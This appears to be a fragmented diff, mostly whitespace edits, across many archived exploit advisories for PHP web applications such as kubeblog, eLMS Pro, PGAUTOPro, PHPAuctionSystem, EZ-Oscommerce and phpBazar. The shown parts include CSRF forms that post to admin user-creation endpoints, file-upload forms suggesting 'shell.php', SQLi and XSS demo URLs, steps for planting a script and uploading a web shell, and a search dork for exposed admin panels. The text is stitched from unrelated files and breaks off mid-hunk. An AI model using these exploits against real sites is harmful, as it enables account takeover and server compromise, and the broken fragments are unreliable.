<p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
|
<p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
|
||||||
|
@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
|
||||||
<a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
|
<a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
|
||||||
<p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
|
<p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
|
||||||
|
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
|
|
||||||
<body bgcolor="#000000">
|
<body bgcolor="#000000">
|
||||||
|
|
||||||
|
@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl
|
||||||
<input type="submit" name="backup" value="Backup Database" />
|
<input type="submit" name="backup" value="Backup Database" />
|
||||||
</font></p>
|
</font></p>
|
||||||
</form>
|
</form>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
|
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
|
||||||
Shooter - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
|
Shooter - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
|
||||||
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
|
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
|
||||||
|
|
||||||
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
||||||
|
|
|
@ -34,7 +34,7 @@ My home : Sec-war.com
|
||||||
</thead>
|
</thead>
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
<td class="optiontitle" colSpan="2">
|
<td class="optiontitle" colSpan="2">
|
||||||
<p align="center"> </td>
|
<p align="center"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
|
@ -50,7 +50,7 @@ My home : Sec-war.com
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
<td class="optiontitle" colSpan="2">
|
<td class="optiontitle" colSpan="2">
|
||||||
<div>
|
<div>
|
||||||
<p align="center"> </div>
|
<p align="center"> </div>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
|
@ -59,13 +59,13 @@ My home : Sec-war.com
|
||||||
<p align="center">PASS must me*</td>
|
<p align="center">PASS must me*</td>
|
||||||
<td class="alt1" width="52%">
|
<td class="alt1" width="52%">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr">
|
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr">
|
||||||
</span></td>
|
</span></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
<td class="optiontitle" colSpan="2">
|
<td class="optiontitle" colSpan="2">
|
||||||
<div>
|
<div>
|
||||||
<p align="center"> </div>
|
<p align="center"> </div>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
|
@ -76,12 +76,12 @@ My home : Sec-war.com
|
||||||
</td>
|
</td>
|
||||||
<td class="alt1" width="52%">
|
<td class="alt1" width="52%">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr">
|
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr">
|
||||||
</span></td>
|
</span></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
<td class="optiontitle" colSpan="2">
|
<td class="optiontitle" colSpan="2">
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
|
@ -97,12 +97,12 @@ My home : Sec-war.com
|
||||||
<option>-- --</option>
|
<option>-- --</option>
|
||||||
<option value="MA"> </option>
|
<option value="MA"> </option>
|
||||||
<option value="EG" selected></option>
|
<option value="EG" selected></option>
|
||||||
</select> <span lang="fr"> </span></td>
|
</select> <span lang="fr"> </span></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr vAlign="top">
|
<tr vAlign="top">
|
||||||
<td class="optiontitle" colSpan="2">
|
<td class="optiontitle" colSpan="2">
|
||||||
<div>
|
<div>
|
||||||
<p align="center"> </div>
|
<p align="center"> </div>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
|
@ -119,12 +119,12 @@ My home : Sec-war.com
|
||||||
<option value="3"></option>
|
<option value="3"></option>
|
||||||
<option value="2"></option>
|
<option value="2"></option>
|
||||||
<option value="1"></option>
|
<option value="1"></option>
|
||||||
</select> <span lang="fr"> </span></td>
|
</select> <span lang="fr"> </span></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tbody id="tbody_bbtitle">
|
<tbody id="tbody_bbtitle">
|
||||||
<tr>
|
<tr>
|
||||||
<td class="tfoot" align="middle" colSpan="2">
|
<td class="tfoot" align="middle" colSpan="2">
|
||||||
<input class="button" id="submit" type="submit" value="ok add ">
|
<input class="button" id="submit" type="submit" value="ok add ">
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
|
|
|
@ -50,7 +50,7 @@ size="2" face="Tahoma">
|
||||||
value="reset" name="B2" style="float: left"></p>
|
value="reset" name="B2" style="float: left"></p>
|
||||||
</form>
|
</form>
|
||||||
<p><br>
|
<p><br>
|
||||||
</p>
|
</p>
|
||||||
</center>
|
</center>
|
||||||
</body>
|
</body>
|
||||||
|
|
||||||
|
|
|
@ -58,7 +58,7 @@ size="2" face="Tahoma">
|
||||||
value="reset" name="B2" style="float: left"></p>
|
value="reset" name="B2" style="float: left"></p>
|
||||||
</form>
|
</form>
|
||||||
<p><br>
|
<p><br>
|
||||||
</p>
|
</p>
|
||||||
</center>
|
</center>
|
||||||
</body>
|
</body>
|
||||||
|
|
||||||
|
|
|
@ -39,7 +39,7 @@
|
||||||
or
|
or
|
||||||
</font>
|
</font>
|
||||||
<font face="Tahoma" size="2" color="#000000">http://victim</font><font
|
<font face="Tahoma" size="2" color="#000000">http://victim</font><font
|
||||||
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
|
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
|
||||||
size="2" face="Tahoma">
|
size="2" face="Tahoma">
|
||||||
<input type="text" name="victim" size="20";"></p>
|
<input type="text" name="victim" size="20";"></p>
|
||||||
<center>
|
<center>
|
||||||
|
@ -49,7 +49,7 @@ size="2" face="Tahoma">
|
||||||
value="reset" name="B2" style="float: left"></p>
|
value="reset" name="B2" style="float: left"></p>
|
||||||
</form>
|
</form>
|
||||||
<p><br>
|
<p><br>
|
||||||
</p>
|
</p>
|
||||||
</center>
|
</center>
|
||||||
</body>
|
</body>
|
||||||
|
|
||||||
|
|
|
@ -42,7 +42,7 @@
|
||||||
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
|
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
|
||||||
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
|
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
|
||||||
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
|
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
|
||||||
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
|
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
|
||||||
</table></form>
|
</table></form>
|
||||||
</html>
|
</html>
|
||||||
|
|
||||||
|
|
|
@ -13,8 +13,8 @@
|
||||||
<form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
|
<form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
|
||||||
<table width="70%" cellpadding="0" cellspacing="2" border="0">
|
<table width="70%" cellpadding="0" cellspacing="2" border="0">
|
||||||
<tr>
|
<tr>
|
||||||
<td width="35%"> </td>
|
<td width="35%"> </td>
|
||||||
<td width="65%"> </td>
|
<td width="65%"> </td>
|
||||||
|
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
|
@ -40,15 +40,15 @@
|
||||||
|
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td></td>
|
<td></td>
|
||||||
<td height="30" style="padding-left:6px;">
|
<td height="30" style="padding-left:6px;">
|
||||||
<input name="Submit" type="submit" class="button" value="Submit">
|
<input name="Submit" type="submit" class="button" value="Submit">
|
||||||
|
|
||||||
|
|
||||||
<input name="Reset" type="reset" class="button" value="Reset">
|
<input name="Reset" type="reset" class="button" value="Reset">
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -57,7 +57,7 @@ _____________________________________________________________
|
||||||
<input name="ok" type="submit" class="button" id="ok" value="OK">
|
<input name="ok" type="submit" class="button" id="ok" value="OK">
|
||||||
</p>
|
</p>
|
||||||
<p align="center">(only gif png jpg are allowed) </p>
|
<p align="center">(only gif png jpg are allowed) </p>
|
||||||
<p align="center">Files go to: http://example.pt/uploads/your_file.php.png</p>
|
<p align="center">Files go to: http://example.pt/uploads/your_file.php.png</p>
|
||||||
</form>
|
</form>
|
||||||
</html>
|
</html>
|
||||||
|
|
||||||
|
|
|
@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&
|
||||||
|
|
||||||
FILE NAME:<br>
|
FILE NAME:<br>
|
||||||
|
|
||||||
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
|
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
|
||||||
|
|
||||||
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
|
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
|
||||||
|
|
||||||
|
|
|
@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii]));
|
||||||
if ($ji==16) {
|
if ($ji==16) {
|
||||||
$ji=0;
|
$ji=0;
|
||||||
$ci++;
|
$ci++;
|
||||||
echo "<td> </td>";
|
echo "<td> </td>";
|
||||||
for ($li=0; $li<=15; $li++)
|
for ($li=0; $li<=15; $li++)
|
||||||
{ echo "<td>".$headeri[$li+$ki]."</td>";
|
{ echo "<td>".$headeri[$li+$ki]."</td>";
|
||||||
}
|
}
|
||||||
|
@ -103,7 +103,7 @@ $ii++;
|
||||||
$ji++;
|
$ji++;
|
||||||
}
|
}
|
||||||
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
|
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
|
||||||
{ echo "<td> </td>";
|
{ echo "<td> </td>";
|
||||||
}
|
}
|
||||||
|
|
||||||
for ($li=$ci*16; $li<=strlen($headeri); $li++)
|
for ($li=$ci*16; $li<=strlen($headeri); $li++)
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
=======================================
|
=======================================
|
||||||
eLMS Pro SQLi and XSS Vulnerability
|
eLMS Pro SQLi and XSS Vulnerability
|
||||||
=======================================
|
=======================================
|
||||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||||
0 _ __ __ __ 1
|
0 _ __ __ __ 1
|
||||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||||
1 \ \____/ >> Exploit database separated by exploit 0
|
1 \ \____/ >> Exploit database separated by exploit 0
|
||||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||||
1 1
|
1 1
|
||||||
0 [+] Site : Inj3ct0r.com 0
|
0 [+] Site : Inj3ct0r.com 0
|
||||||
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
|
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
|
||||||
0 0
|
0 0
|
||||||
1 ########################################## 1
|
1 ########################################## 1
|
||||||
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
||||||
1 ########################################## 0
|
1 ########################################## 0
|
||||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||||
|
|
||||||
Name : eLMS Pro SQLi and XSS Vulnerability
|
Name : eLMS Pro SQLi and XSS Vulnerability
|
||||||
|
@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels.
|
||||||
|
|
||||||
Xploit: SQLi Vulnerability
|
Xploit: SQLi Vulnerability
|
||||||
|
|
||||||
DEMO URL :http://[site]/subscribe.php?course_id=[sqli]
|
DEMO URL :http://[site]/subscribe.php?course_id=[sqli]
|
||||||
|
|
||||||
###############################################################################################################
|
###############################################################################################################
|
||||||
Xploit: XSS Vulnerability
|
Xploit: XSS Vulnerability
|
||||||
|
|
||||||
Attack Pattern: '"-->
|
Attack Pattern: '"-->
|
||||||
|
|
||||||
http://[site]/subscribe.php?course_id=[XSS]
|
http://[site]/subscribe.php?course_id=[XSS]
|
||||||
|
|
||||||
|
|
||||||
###############################################################################################################
|
###############################################################################################################
|
||||||
|
|
|
@ -1,23 +1,23 @@
|
||||||
=======================================
|
=======================================
|
||||||
PGAUTOPro SQLi and XSS Vulnerability
|
PGAUTOPro SQLi and XSS Vulnerability
|
||||||
=======================================
|
=======================================
|
||||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||||
0 _ __ __ __ 1
|
0 _ __ __ __ 1
|
||||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||||
1 \ \____/ >> Exploit database separated by exploit 0
|
1 \ \____/ >> Exploit database separated by exploit 0
|
||||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||||
1 1
|
1 1
|
||||||
0 [+] Site : Inj3ct0r.com 0
|
0 [+] Site : Inj3ct0r.com 0
|
||||||
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
|
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
|
||||||
0 0
|
0 0
|
||||||
1 ########################################## 1
|
1 ########################################## 1
|
||||||
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
||||||
1 ########################################## 0
|
1 ########################################## 0
|
||||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||||
|
|
||||||
Name : PGAUTOPro SQLi and XSS Vulnerability
|
Name : PGAUTOPro SQLi and XSS Vulnerability
|
||||||
|
@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit
|
||||||
|
|
||||||
Xploit: SQLi Vulnerability
|
Xploit: SQLi Vulnerability
|
||||||
|
|
||||||
DEMO
|
DEMO
|
||||||
|
|
||||||
URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
|
URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
|
||||||
|
|
||||||
|
@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi]
|
||||||
###############################################################################################################
|
###############################################################################################################
|
||||||
Xploit: XSS Vulnerability
|
Xploit: XSS Vulnerability
|
||||||
|
|
||||||
Attack Pattern: '"-->
|
Attack Pattern: '"-->
|
||||||
|
|
||||||
http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
|
http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
|
||||||
|
|
||||||
|
|
||||||
###############################################################################################################
|
###############################################################################################################
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
Name : PHPAuctionSystem Upload Vulnerability
|
Name : PHPAuctionSystem Upload Vulnerability
|
||||||
Date : june, 16 2010
|
Date : june, 16 2010
|
||||||
Vendor url :http://www.phpauctions.info/
|
Vendor url :http://www.phpauctions.info/
|
||||||
Critical Level : HIGH
|
Critical Level : HIGH
|
||||||
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
||||||
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
|
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
|
||||||
greetz to :All ICW members and my friends :) luv y0 guyz
|
greetz to :All ICW members and my friends :) luv y0 guyz
|
||||||
#######################################################################################################
|
#######################################################################################################
|
||||||
|
|
||||||
|
|
||||||
PHPAuctionSystem had various vulnerablities which was found
|
PHPAuctionSystem had various vulnerablities which was found
|
||||||
|
|
||||||
|
@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found
|
||||||
|
|
||||||
Xploit:Upload Vulnerability
|
Xploit:Upload Vulnerability
|
||||||
|
|
||||||
Step 1: register as a user :)
|
Step 1: register as a user :)
|
||||||
|
|
||||||
Step 2: goto "sell an item" option
|
|
||||||
|
|
||||||
DEMO URL :http://[site]/select_category.php?
|
Step 2: goto "sell an item" option
|
||||||
|
|
||||||
Step 3: post ur evil-code in the item description
|
DEMO URL :http://[site]/select_category.php?
|
||||||
|
|
||||||
Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
|
Step 3: post ur evil-code in the item description
|
||||||
|
|
||||||
demo url :http://[site]/sell.php :)
|
Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
|
||||||
|
|
||||||
|
demo url :http://[site]/sell.php :)
|
||||||
|
|
||||||
|
|
||||||
###############################################################################################################
|
###############################################################################################################
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
Date : june, 18 2010
|
Date : june, 18 2010
|
||||||
Vendor url :http://www.axxis.gr/
|
Vendor url :http://www.axxis.gr/
|
||||||
Critical Level : HIGH
|
Critical Level : HIGH
|
||||||
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
||||||
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
|
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
|
||||||
greetz to :All ICW members and my friends :) luv y0 guyz
|
greetz to :All ICW members and my friends :) luv y0 guyz
|
||||||
|
@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability
|
||||||
Step 1 : As always register as a user :P
|
Step 1 : As always register as a user :P
|
||||||
|
|
||||||
Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
|
Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
|
||||||
|
|
||||||
INsert your evil XSS script or xss shell ;) and voila
|
INsert your evil XSS script or xss shell ;) and voila
|
||||||
|
|
||||||
DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
|
DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
|
||||||
|
|
||||||
|
|
|
@ -39,7 +39,7 @@ HackTalk Security
|
||||||
|
|
||||||
</tr>
|
</tr>
|
||||||
<tr style="display:none;">
|
<tr style="display:none;">
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td style="font-size: 10px;">
|
<td style="font-size: 10px;">
|
||||||
Please note: You should only enter values in the above fields if you wish to change this users password
|
Please note: You should only enter values in the above fields if you wish to change this users password
|
||||||
</td>
|
</td>
|
||||||
|
@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
|
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td>
|
<td>
|
||||||
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
|
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
|
||||||
<label for="active">Active</label>
|
<label for="active">Active</label>
|
||||||
|
@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
|
||||||
</tr>
|
</tr>
|
||||||
|
|
||||||
<tr>
|
<tr>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td>
|
<td>
|
||||||
<input type="submit" name="submit" value="Add" />
|
<input type="submit" name="submit" value="Add" />
|
||||||
<input type="reset" name="reset" value="Reset" />
|
<input type="reset" name="reset" value="Reset" />
|
||||||
|
|
|
@ -87,7 +87,7 @@ return(true);
|
||||||
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
|
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
|
||||||
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
|
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
|
||||||
</TD></TR>
|
</TD></TR>
|
||||||
<TR><TD> </TD></TR>
|
<TR><TD> </TD></TR>
|
||||||
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
|
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
|
||||||
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
|
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
|
||||||
file is completely transferred.<BR><BR></TD></TR>
|
file is completely transferred.<BR><BR></TD></TR>
|
||||||
|
|
|
@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for
|
||||||
categories, plugins, languages, and themes."
|
categories, plugins, languages, and themes."
|
||||||
|
|
||||||
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
|
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
|
||||||
- Mail: security[AT]adeo.com.tr
|
- Mail: security[AT]adeo.com.tr
|
||||||
- Web: http://security.adeo.com.tr
|
- Web: http://security.adeo.com.tr
|
||||||
|
|
||||||
# Vulnerability:
|
# Vulnerability:
|
||||||
If administrator of the board browse PoC attacker can gain privilege
|
If administrator of the board browse PoC attacker can gain privilege
|
||||||
|
|
|
@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload
|
||||||
|
|
||||||
FILE NAME:<br>
|
FILE NAME:<br>
|
||||||
|
|
||||||
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
|
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
|
||||||
|
|
||||||
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
|
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
|
||||||
|
|
||||||
|
|
|
@ -2,33 +2,33 @@
|
||||||
phpBazar admin information discloser Vulnerability
|
phpBazar admin information discloser Vulnerability
|
||||||
=====================================
|
=====================================
|
||||||
|
|
||||||
Author :: Net_Spy
|
Author :: Net_Spy
|
||||||
Group :: Aras cyber Army
|
Group :: Aras cyber Army
|
||||||
Email :: tvc82_2002@yahoo.com
|
Email :: tvc82_2002@yahoo.com
|
||||||
Discover :: 1 july 2010
|
Discover :: 1 july 2010
|
||||||
Critical Lvl :: M
|
Critical Lvl :: M
|
||||||
Published :: 22 july 2010
|
Published :: 22 july 2010
|
||||||
Vendor :: http://www.smartisoft.com/
|
Vendor :: http://www.smartisoft.com/
|
||||||
---------------------------------------------------------------------------
|
---------------------------------------------------------------------------
|
||||||
~~~~~~~~~
|
~~~~~~~~~
|
||||||
|
|
||||||
Dork :: intitle: phpBazar-AdminPanel
|
Dork :: intitle: phpBazar-AdminPanel
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
|
demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
|
||||||
|
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
|
Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
|
||||||
|
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
+++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++
|
||||||
[!] greetiz to ::
|
[!] greetiz to ::
|
||||||
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
|
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
|
||||||
All aras cyber amry members
|
All aras cyber amry members
|
||||||
|
|
||||||
+++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++
|
|
@ -33,8 +33,8 @@ Detail :
|
||||||
$title = $lang['saved_search'];
|
$title = $lang['saved_search'];
|
||||||
}
|
}
|
||||||
$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
|
$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
|
||||||
